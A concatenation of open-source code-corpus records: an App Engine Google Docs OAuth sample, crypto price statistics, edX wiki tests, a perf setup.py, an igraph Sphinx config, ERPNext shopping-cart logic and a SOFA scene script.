# Remember the access token in the current user's token store
if access_token and users.get_current_user():
gdocs.token_store.add_token(access_token)
elif access_token:
gdocs.current_token = access_token
gdocs.SetOAuthToken(access_token)
self.redirect('/')
# POST /get_oauth_token
def post(self):
"""Fetches a request token and redirects the user to the approval page."""
self.session = Session()
if users.get_current_user():
# 1.) REQUEST TOKEN STEP. Provide the data scope(s) and the page we'll
# be redirected back to after the user grants access on the approval page.
req_token = gdocs.FetchOAuthRequestToken(
scopes=SETTINGS['SCOPES'], oauth_callback=self.request.uri)
# When using HMAC, persist the token secret in order to re-create an
# OAuthToken object coming back from the approval page.
self.session['oauth_token_secret'] = req_token.secret
# Generate the URL to redirect the user to. Add the hd parameter for a
# better user experience. Leaving it off will give the user the choice
# of which account (Google vs. Google Apps) to log in with.
domain = self.request.get('domain', default_value='default')
approval_page_url = gdocs.GenerateOAuthAuthorizationURL(
extra_params={'hd': domain})
# 2.) APPROVAL STEP. Redirect the user to Google's OAuth approval page.
self.redirect(approval_page_url)
class FetchData(OAuthDance):
"""Fetches the user's data."""
"""This class inherits from OAuthDance in order to utilize OAuthDance.post()
in case of a request error (e.g. the user has a bad token)."""
# GET /fetch_data
def get(self):
self.redirect('/')
# POST /fetch_data
def post(self):
"""Fetches the user's data."""
try:
feed = gdocs.GetDocumentListFeed()
json = []
for entry in feed.entry:
if entry.lastModifiedBy is not None:
last_modified_by = entry.lastModifiedBy.email.text
else:
last_modified_by = ''
if entry.lastViewed is not None:
last_viewed = entry.lastViewed.text
else:
last_viewed = ''
json.append({'title': entry.title.text,
'links': {'alternate': entry.GetHtmlLink().href},
'published': entry.published.text,
'updated': entry.updated.text,
'resourceId': entry.resourceId.text,
'type': entry.GetDocumentType(),
'lastModifiedBy': last_modified_by,
'lastViewed': last_viewed
})
self.response.out.write(simplejson.dumps(json))
except gdata.service.RequestError, error:
OAuthDance.post(self)
class RevokeToken(webapp.RequestHandler):
# GET /revoke_token
def get(self):
"""Revokes the current user's OAuth access token."""
try:
gdocs.RevokeOAuthToken()
except gdata.service.RevokingOAuthTokenFailed:
pass
gdocs.token_store.remove_all_tokens()
self.redirect('/')
def main():
application = webapp.WSGIApplication([('/', MainPage),
('/get_oauth_token', OAuthDance),
('/fetch_data', FetchData),
('/revoke_token', RevokeToken)],
debug=True)
run_wsgi_app(application)
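# The standard App Engine entry-point guard; assumed from the usual sample
# layout, since the record ends at run_wsgi_app().
if __name__ == '__main__':
  main()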
| agpl-3.0 |
lorganthesorn/CryptoArb | Analysis/Stats.py | 1 | 1747 | import numpy as np
import pandas as pd
from scipy import stats
from matplotlib import pyplot as plt
from statsmodels.tsa.stattools import grangercausalitytests
from GetHistory import CrpytoCompare
def granger_test(base='BTC', quote='USD', exchange1='Bitfinex', exchange2='BitTrex'):
df_ex1 = CrpytoCompare.crypto_close(base, quote, exchange1)
df_ex2 = CrpytoCompare.crypto_close(base, quote, exchange2)
df = pd.concat([df_ex1.diff(), df_ex2.diff()], axis=1, join='inner')
df.dropna(inplace=True)
#print(df)
print(grangercausalitytests(df, 5))
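# A minimal sketch of pulling p-values out of the statsmodels result instead of
# printing it; granger_pvalues is a hypothetical helper, not part of the
# original module.
def granger_pvalues(df, maxlag=5):
    # grangercausalitytests returns {lag: (test_dict, fitted_models)}; the
    # 'ssr_ftest' entry is an (F, p-value, df_denom, df_num) tuple.
    results = grangercausalitytests(df, maxlag, verbose=False)
    return {lag: res[0]['ssr_ftest'][1] for lag, res in results.items()}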
def correlation(df):
df1 = df.dropna().drop_duplicates()
dfP = df1.dropna(axis=1, how='any')
m = dfP.mean(axis=0)
s = dfP.std(ddof=1, axis=0)
# normalised time-series as an input for PCA
dfPort = (dfP - m)/s
c = np.cov(dfPort.values.T) # covariance matrix
co = np.corrcoef(dfP.values.T) # correlation matrix
tickers = list(dfP.columns)
plt.figure(figsize=(8,8))
plt.imshow(co, cmap="RdGy", interpolation="nearest")
cb = plt.colorbar()
cb.set_label("Correlation Matrix Coefficients")
plt.title("Correlation Matrix", fontsize=14)
plt.xticks(np.arange(len(tickers)), tickers, rotation=90)
plt.yticks(np.arange(len(tickers)), tickers)
# perform PCA
#w, v = np.linalg.eig(c)
#ax = plt.figure(figsize=(8,8)).gca()
#plt.imshow(v, cmap="bwr", interpolation="nearest")
#cb = plt.colorbar()
#plt.yticks(np.arange(len(tickers)), tickers)
#plt.xlabel("PC Number")
#plt.title("PCA", fontsize=14)
# force x-tickers to be displayed as integers (not floats)
#ax.xaxis.set_major_locator(MaxNLocator(integer=True))
plt.show()
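# Example usage (assumed data layout: one close-price column per ticker):
#   frame = pd.concat([btc_close, eth_close], axis=1, join='inner')
#   correlation(frame)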
if __name__ == '__main__':
granger_test() | mit |
Endika/edx-platform | lms/djangoapps/course_wiki/tests/tests.py | 19 | 6909 | from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr
from courseware.tests.tests import LoginEnrollmentTestCase
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from mock import patch
@attr('shard_1')
class WikiRedirectTestCase(LoginEnrollmentTestCase, ModuleStoreTestCase):
"""
Tests for wiki course redirection.
"""
def setUp(self):
super(WikiRedirectTestCase, self).setUp()
self.toy = CourseFactory.create(org='edX', course='toy', display_name='2012_Fall')
# Create two accounts
self.student = 'view@test.com'
self.instructor = 'view2@test.com'
self.password = 'foo'
for username, email in [('u1', self.student), ('u2', self.instructor)]:
self.create_account(username, email, self.password)
self.activate_user(email)
self.logout()
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_wiki_redirect(self):
"""
Test that requesting wiki URLs redirect properly to or out of classes.
An enrolled student going from /courses/edX/toy/2012_Fall/progress
to /wiki/some/fake/wiki/page/ will be redirected to
/courses/edX/toy/2012_Fall/wiki/some/fake/wiki/page/
An unenrolled student going to /courses/edX/toy/2012_Fall/wiki/some/fake/wiki/page/
will be redirected to /wiki/some/fake/wiki/page/
"""
self.login(self.student, self.password)
self.enroll(self.toy)
referer = reverse("progress", kwargs={'course_id': self.toy.id.to_deprecated_string()})
destination = reverse("wiki:get", kwargs={'path': 'some/fake/wiki/page/'})
redirected_to = referer.replace("progress", "wiki/some/fake/wiki/page/")
resp = self.client.get(destination, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp['Location'], 'http://testserver' + redirected_to)
# Now we test that the student will be redirected away from that page if the course doesn't exist
# We do this in the same test because we want to make sure the redirected_to is constructed correctly
# This is a location like /courses/*/wiki/* , but with an invalid course ID
bad_course_wiki_page = redirected_to.replace(self.toy.location.course, "bad_course")
resp = self.client.get(bad_course_wiki_page, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp['Location'], 'http://testserver' + destination)
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': False})
def test_wiki_no_root_access(self):
"""
Test to verify that wikis normally cannot be browsed from the /wiki/xxxx/yyy/zz URLs
"""
self.login(self.student, self.password)
self.enroll(self.toy)
referer = reverse("progress", kwargs={'course_id': self.toy.id.to_deprecated_string()})
destination = reverse("wiki:get", kwargs={'path': 'some/fake/wiki/page/'})
resp = self.client.get(destination, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 403)
def create_course_page(self, course):
"""
Test that loading the course wiki page creates the wiki page.
The user must be enrolled in the course to see the page.
"""
course_wiki_home = reverse('course_wiki', kwargs={'course_id': course.id.to_deprecated_string()})
referer = reverse("progress", kwargs={'course_id': self.toy.id.to_deprecated_string()})
resp = self.client.get(course_wiki_home, follow=True, HTTP_REFERER=referer)
course_wiki_page = referer.replace('progress', 'wiki/' + self.toy.wiki_slug + "/")
ending_location = resp.redirect_chain[-1][0]
self.assertEquals(ending_location, 'http://testserver' + course_wiki_page)
self.assertEquals(resp.status_code, 200)
self.has_course_navigator(resp)
def has_course_navigator(self, resp):
"""
Ensure that the response has the course navigator.
"""
self.assertContains(resp, "Home")
self.assertContains(resp, "Course")
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_course_navigator(self):
""""
Test that going from a course page to a wiki page contains the course navigator.
"""
self.login(self.student, self.password)
self.enroll(self.toy)
self.create_course_page(self.toy)
course_wiki_page = reverse('wiki:get', kwargs={'path': self.toy.wiki_slug + '/'})
referer = reverse("courseware", kwargs={'course_id': self.toy.id.to_deprecated_string()})
resp = self.client.get(course_wiki_page, follow=True, HTTP_REFERER=referer)
self.has_course_navigator(resp)
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_wiki_not_accessible_when_not_enrolled(self):
"""
Test that going from a course page to a wiki page when not enrolled
redirects a user to the course about page
"""
self.login(self.instructor, self.password)
self.enroll(self.toy)
self.create_course_page(self.toy)
self.logout()
self.login(self.student, self.password)
course_wiki_page = reverse('wiki:get', kwargs={'path': self.toy.wiki_slug + '/'})
referer = reverse("courseware", kwargs={'course_id': self.toy.id.to_deprecated_string()})
# When not enrolled, we should get a 302
resp = self.client.get(course_wiki_page, follow=False, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 302)
# and end up at the course about page
resp = self.client.get(course_wiki_page, follow=True, HTTP_REFERER=referer)
target_url, __ = resp.redirect_chain[-1]
self.assertTrue(
target_url.endswith(reverse('about_course', args=[self.toy.id.to_deprecated_string()]))
)
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_redirect_when_not_logged_in(self):
"""
Test that attempting to reach a course wiki page when not logged in
redirects the user to the login page
"""
self.logout()
course_wiki_page = reverse('wiki:get', kwargs={'path': self.toy.wiki_slug + '/'})
# When not logged in, we should get a 302
resp = self.client.get(course_wiki_page, follow=False)
self.assertEqual(resp.status_code, 302)
# and end up at the login page
resp = self.client.get(course_wiki_page, follow=True)
target_url, __ = resp.redirect_chain[-1]
self.assertTrue(reverse('signin_user') in target_url)
| agpl-3.0 |
wuby986/Sixty-4Stroke-kernel | tools/perf/util/setup.py | 2079 | 1438 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
libtraceevent = getenv('LIBTRACEEVENT')
liblk = getenv('LIBLK')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
extra_objects = [libtraceevent, liblk],
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
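# This script is not meant to be run by hand; the perf Makefile exports
# PYTHON_EXTBUILD_LIB, PYTHON_EXTBUILD_TMP, LIBTRACEEVENT and LIBLK and then
# invokes it along the lines of (assumed invocation, details vary by tree):
#   python util/setup.py --quiet build_ext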
| gpl-2.0 |
nickeubank/python-igraph | doc/source/conf.py | 2 | 8435 | # -*- coding: utf-8 -*-
#
# python-igraph documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 17 11:36:14 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'python-igraph'
copyright = u'2010-2013, Tamás Nepusz, Gábor Csárdi'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.7'
# The full version, including alpha/beta/rc tags.
release = '0.7'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['include/*.rst']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"navbar_fixed_top": "false",
"navbar_class": "navbar navbar-inverse",
"bootstrap_version": "3"
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = False
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'python-igraphdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'python-igraph.tex', u'python-igraph Documentation',
u'Tamas Nepusz, Gabor Csardi', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'python-igraph', u'python-igraph Documentation',
[u'Tamas Nepusz, Gabor Csardi'], 1)
]
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'python-igraph'
epub_author = u'Tamas Nepusz, Gabor Csardi'
epub_publisher = u'Tamas Nepusz, Gabor Csardi'
epub_copyright = u'2010, Tamas Nepusz, Gabor Csardi'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
| gpl-2.0 |
gangadhar-kadam/verve_test_erp | erpnext/shopping_cart/cart.py | 6 | 11386 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import throw, _
import frappe.defaults
from frappe.utils import flt, get_fullname, fmt_money, cstr
from erpnext.utilities.doctype.address.address import get_address_display
from frappe.utils.nestedset import get_root_of
class WebsitePriceListMissingError(frappe.ValidationError): pass
def set_cart_count(quotation=None):
if not quotation:
quotation = _get_cart_quotation()
cart_count = cstr(len(quotation.get("items")))
frappe.local.cookie_manager.set_cookie("cart_count", cart_count)
@frappe.whitelist()
def get_cart_quotation(doc=None):
party = get_lead_or_customer()
if not doc:
quotation = _get_cart_quotation(party)
doc = quotation
set_cart_count(quotation)
return {
"doc": decorate_quotation_doc(doc),
"addresses": [{"name": address.name, "display": address.display}
for address in get_address_docs(party)],
"shipping_rules": get_applicable_shipping_rules(party)
}
@frappe.whitelist()
def place_order():
quotation = _get_cart_quotation()
quotation.company = frappe.db.get_value("Shopping Cart Settings", None, "company")
for fieldname in ["customer_address", "shipping_address_name"]:
if not quotation.get(fieldname):
throw(_("{0} is required").format(quotation.meta.get_label(fieldname)))
quotation.flags.ignore_permissions = True
quotation.submit()
if quotation.lead:
# company used to create customer accounts
frappe.defaults.set_user_default("company", quotation.company)
from erpnext.selling.doctype.quotation.quotation import _make_sales_order
sales_order = frappe.get_doc(_make_sales_order(quotation.name, ignore_permissions=True))
for item in sales_order.get("items"):
item.reserved_warehouse = frappe.db.get_value("Item", item.item_code, "website_warehouse") or None
sales_order.flags.ignore_permissions = True
sales_order.insert()
sales_order.submit()
frappe.local.cookie_manager.delete_cookie("cart_count")
return sales_order.name
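# place_order() is whitelisted, so the storefront JS can invoke it directly; a
# hedged sketch of the client-side call (names per frappe's client API, dotted
# path derived from this module's location):
#   frappe.call({method: "erpnext.shopping_cart.cart.place_order", ...})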
@frappe.whitelist()
def update_cart(item_code, qty, with_doc):
quotation = _get_cart_quotation()
qty = flt(qty)
if qty == 0:
quotation.set("items", quotation.get("items", {"item_code": ["!=", item_code]}))
if not quotation.get("items") and \
not quotation.get("__islocal"):
quotation.__delete = True
else:
quotation_items = quotation.get("items", {"item_code": item_code})
if not quotation_items:
quotation.append("items", {
"doctype": "Quotation Item",
"item_code": item_code,
"qty": qty
})
else:
quotation_items[0].qty = qty
apply_cart_settings(quotation=quotation)
if hasattr(quotation, "__delete"):
frappe.delete_doc("Quotation", quotation.name, ignore_permissions=True)
quotation = _get_cart_quotation()
else:
quotation.flags.ignore_permissions = True
quotation.save()
set_cart_count(quotation)
if with_doc:
return get_cart_quotation(quotation)
else:
return quotation.name
@frappe.whitelist()
def update_cart_address(address_fieldname, address_name):
quotation = _get_cart_quotation()
address_display = get_address_display(frappe.get_doc("Address", address_name).as_dict())
if address_fieldname == "shipping_address_name":
quotation.shipping_address_name = address_name
quotation.shipping_address = address_display
if not quotation.customer_address:
address_fieldname == "customer_address"
if address_fieldname == "customer_address":
quotation.customer_address = address_name
quotation.address_display = address_display
apply_cart_settings(quotation=quotation)
quotation.flags.ignore_permissions = True
quotation.save()
return get_cart_quotation(quotation)
def guess_territory():
territory = None
geoip_country = frappe.session.get("session_country")
if geoip_country:
territory = frappe.db.get_value("Territory", geoip_country)
return territory or \
frappe.db.get_value("Shopping Cart Settings", None, "territory") or \
get_root_of("Territory")
def decorate_quotation_doc(quotation_doc):
doc = frappe._dict(quotation_doc.as_dict())
for d in doc.get("items", []):
d.update(frappe.db.get_value("Item", d["item_code"],
["website_image", "description", "page_name"], as_dict=True))
d["formatted_rate"] = fmt_money(d.get("rate"), currency=doc.currency)
d["formatted_amount"] = fmt_money(d.get("amount"), currency=doc.currency)
for d in doc.get("taxes", []):
d["formatted_tax_amount"] = fmt_money(flt(d.get("tax_amount_after_discount_amount")),
currency=doc.currency)
doc.formatted_grand_total_export = fmt_money(doc.grand_total,
currency=doc.currency)
return doc
def _get_cart_quotation(party=None):
if not party:
party = get_lead_or_customer()
quotation = frappe.db.get_value("Quotation",
{party.doctype.lower(): party.name, "order_type": "Shopping Cart", "docstatus": 0})
if quotation:
qdoc = frappe.get_doc("Quotation", quotation)
else:
qdoc = frappe.get_doc({
"doctype": "Quotation",
"naming_series": frappe.defaults.get_user_default("shopping_cart_quotation_series") or "QTN-CART-",
"quotation_to": party.doctype,
"company": frappe.db.get_value("Shopping Cart Settings", None, "company"),
"order_type": "Shopping Cart",
"status": "Draft",
"docstatus": 0,
"__islocal": 1,
(party.doctype.lower()): party.name
})
if party.doctype == "Customer":
qdoc.contact_person = frappe.db.get_value("Contact", {"email_id": frappe.session.user,
"customer": party.name})
qdoc.flags.ignore_permissions = True
qdoc.run_method("set_missing_values")
apply_cart_settings(party, qdoc)
return qdoc
def update_party(fullname, company_name=None, mobile_no=None, phone=None):
party = get_lead_or_customer()
if party.doctype == "Lead":
party.company_name = company_name
party.lead_name = fullname
party.mobile_no = mobile_no
party.phone = phone
else:
party.customer_name = company_name or fullname
party.customer_type == "Company" if company_name else "Individual"
contact_name = frappe.db.get_value("Contact", {"email_id": frappe.session.user,
"customer": party.name})
contact = frappe.get_doc("Contact", contact_name)
contact.first_name = fullname
contact.last_name = None
contact.customer_name = party.customer_name
contact.mobile_no = mobile_no
contact.phone = phone
contact.flags.ignore_permissions = True
contact.save()
party_doc = frappe.get_doc(party.as_dict())
party_doc.flags.ignore_permissions = True
party_doc.save()
qdoc = _get_cart_quotation(party)
if not qdoc.get("__islocal"):
qdoc.customer_name = company_name or fullname
qdoc.run_method("set_missing_lead_customer_details")
qdoc.flags.ignore_permissions = True
qdoc.save()
def apply_cart_settings(party=None, quotation=None):
if not party:
party = get_lead_or_customer()
if not quotation:
quotation = _get_cart_quotation(party)
cart_settings = frappe.get_doc("Shopping Cart Settings")
billing_territory = get_address_territory(quotation.customer_address) or \
party.territory or get_root_of("Territory")
set_price_list_and_rate(quotation, cart_settings, billing_territory)
quotation.run_method("calculate_taxes_and_totals")
set_taxes(quotation, cart_settings, billing_territory)
_apply_shipping_rule(party, quotation, cart_settings)
def set_price_list_and_rate(quotation, cart_settings, billing_territory):
"""set price list based on billing territory"""
quotation.selling_price_list = cart_settings.get_price_list(billing_territory)
# reset values
quotation.price_list_currency = quotation.currency = \
quotation.plc_conversion_rate = quotation.conversion_rate = None
for item in quotation.get("items"):
item.price_list_rate = item.discount_percentage = item.rate = item.amount = None
# refetch values
quotation.run_method("set_price_list_and_item_details")
# set it in cookies for use on the product page
frappe.local.cookie_manager.set_cookie("selling_price_list", quotation.selling_price_list)
def set_taxes(quotation, cart_settings, billing_territory):
"""set taxes based on billing territory"""
quotation.taxes_and_charges = cart_settings.get_tax_master(billing_territory)
# clear table
quotation.set("taxes", [])
# append taxes
quotation.append_taxes_from_master("taxes", "taxes_and_charges")
def get_lead_or_customer():
customer = frappe.db.get_value("Contact", {"email_id": frappe.session.user}, "customer")
if customer:
return frappe.get_doc("Customer", customer)
lead = frappe.db.get_value("Lead", {"email_id": frappe.session.user})
if lead:
return frappe.get_doc("Lead", lead)
else:
lead_doc = frappe.get_doc({
"doctype": "Lead",
"email_id": frappe.session.user,
"lead_name": get_fullname(frappe.session.user),
"territory": guess_territory(),
"status": "Open" # TODO: set something better???
})
if frappe.session.user not in ("Guest", "Administrator"):
lead_doc.flags.ignore_permissions = True
lead_doc.insert()
return lead_doc
def get_address_docs(party=None):
if not party:
party = get_lead_or_customer()
address_docs = frappe.db.sql("""select * from `tabAddress`
where `%s`=%s order by name""" % (party.doctype.lower(), "%s"), party.name,
as_dict=True, update={"doctype": "Address"})
for address in address_docs:
address.display = get_address_display(address)
address.display = (address.display).replace("\n", "<br>\n")
return address_docs
@frappe.whitelist()
def apply_shipping_rule(shipping_rule):
quotation = _get_cart_quotation()
quotation.shipping_rule = shipping_rule
apply_cart_settings(quotation=quotation)
quotation.flags.ignore_permissions = True
quotation.save()
return get_cart_quotation(quotation)
def _apply_shipping_rule(party=None, quotation=None, cart_settings=None):
shipping_rules = get_shipping_rules(party, quotation, cart_settings)
if not shipping_rules:
return
elif quotation.shipping_rule not in shipping_rules:
quotation.shipping_rule = shipping_rules[0]
quotation.run_method("apply_shipping_rule")
quotation.run_method("calculate_taxes_and_totals")
def get_applicable_shipping_rules(party=None, quotation=None):
shipping_rules = get_shipping_rules(party, quotation)
if shipping_rules:
rule_label_map = frappe.db.get_values("Shipping Rule", shipping_rules, "label")
# we need this in sorted order as per the position of the rule in the settings page
return [[rule, rule_label_map.get(rule)] for rule in shipping_rules]
def get_shipping_rules(party=None, quotation=None, cart_settings=None):
if not party:
party = get_lead_or_customer()
if not quotation:
quotation = _get_cart_quotation()
if not cart_settings:
cart_settings = frappe.get_doc("Shopping Cart Settings")
# set shipping rule based on shipping territory
shipping_territory = get_address_territory(quotation.shipping_address_name) or \
party.territory
shipping_rules = cart_settings.get_shipping_rules(shipping_territory)
return shipping_rules
def get_address_territory(address_name):
"""Tries to match city, state and country of address to existing territory"""
territory = None
if address_name:
address_fields = frappe.db.get_value("Address", address_name,
["city", "state", "country"])
for value in address_fields:
territory = frappe.db.get_value("Territory", value)
if territory:
break
return territory
| agpl-3.0 |
hdeling/sofa | applications/plugins/SofaPython/doc/SofaDays_oct2013/4_ObjectCreator/ObjectCreator.py | 5 | 3041 | import Sofa
# utility python module to dynamically create objects in Sofa
def createDragon(parentNode,name,x,y,z,color):
node = parentNode.createChild(name)
# <EulerImplicit name="cg_odesolver" printLog="false" />
node.createObject('EulerImplicit',name='cg_odesolver')
# <CGLinearSolver iterations="25" name="linear solver" tolerance="1.0e-9" threshold="1.0e-9" />
node.createObject('CGLinearSolver', name='linear solver', iterations=25, tolerance=1.0e-9, threshold=1.0e-9)
node.createObject('MechanicalObject', dx=x, dy=y, dz=z)
node.createObject('UniformMass',name='mass',totalmass=10)
node.createObject('RegularGrid', name='RegularGrid1',nx=6, ny=5, nz=3, xmin=-11, xmax=11, ymin=-7, ymax=7, zmin=-4, zmax=4)
node.createObject('RegularGridSpringForceField', name='Springs', stiffness=350, damping=1 )
VisuNode = node.createChild('VisuDragon')
VisuNode.createObject('OglModel', name='Visual', filename='mesh/dragon.obj', color=color, dx=x, dy=y, dz=z)
VisuNode.createObject('BarycentricMapping', input='@..', output='@Visual')
SurfNode = node.createChild('Surf')
SurfNode.createObject('MeshObjLoader', name="loader", filename="mesh/dragon.obj")
SurfNode.createObject('Mesh', src="@loader")
SurfNode.createObject('MechanicalObject', src="@loader", dx=x, dy=y, dz=z)
SurfNode.createObject('Triangle')
SurfNode.createObject('Line')
SurfNode.createObject('Point')
SurfNode.createObject('BarycentricMapping')
return node
def createArmadillo(parentNode,name,x,y,z,color):
node = parentNode.createChild(name)
# <EulerImplicit name="cg_odesolver" printLog="false" />
node.createObject('EulerImplicit',name='cg_odesolver')
# <CGLinearSolver iterations="25" name="linear solver" tolerance="1.0e-9" threshold="1.0e-9" />
node.createObject('CGLinearSolver', name='linear solver', iterations=25, tolerance=1.0e-9, threshold=1.0e-9)
node.createObject('MechanicalObject', dx=x, dy=y, dz=z)
node.createObject('UniformMass',name='mass',totalmass=10)
# node.createObject('SparseGridTopology', n="4 4 4", fileTopology="mesh/Armadillo_verysimplified.obj")
# node.createObject('HexahedronFEMForceField', youngModulus=100)
node.createObject('RegularGrid', name='RegularGrid1',nx=4, ny=4, nz=4, xmin=-6, xmax=6, ymin=-6, ymax=9, zmin=-5, zmax=5)
node.createObject('RegularGridSpringForceField', name='Springs', stiffness=350, damping=1 )
VisuNode = node.createChild('VisuArmadillo')
VisuNode.createObject('OglModel', name='Visual', filename='mesh/Armadillo_verysimplified.obj', color=color, dx=x, dy=y, dz=z)
VisuNode.createObject('BarycentricMapping', input='@..', output='@Visual')
SurfNode = node.createChild('Surf')
SurfNode.createObject('MeshObjLoader', name="loader", filename="mesh/Armadillo_verysimplified.obj")
SurfNode.createObject('Mesh', src="@loader")
SurfNode.createObject('MechanicalObject', src="@loader", dx=x, dy=y, dz=z)
SurfNode.createObject('Triangle')
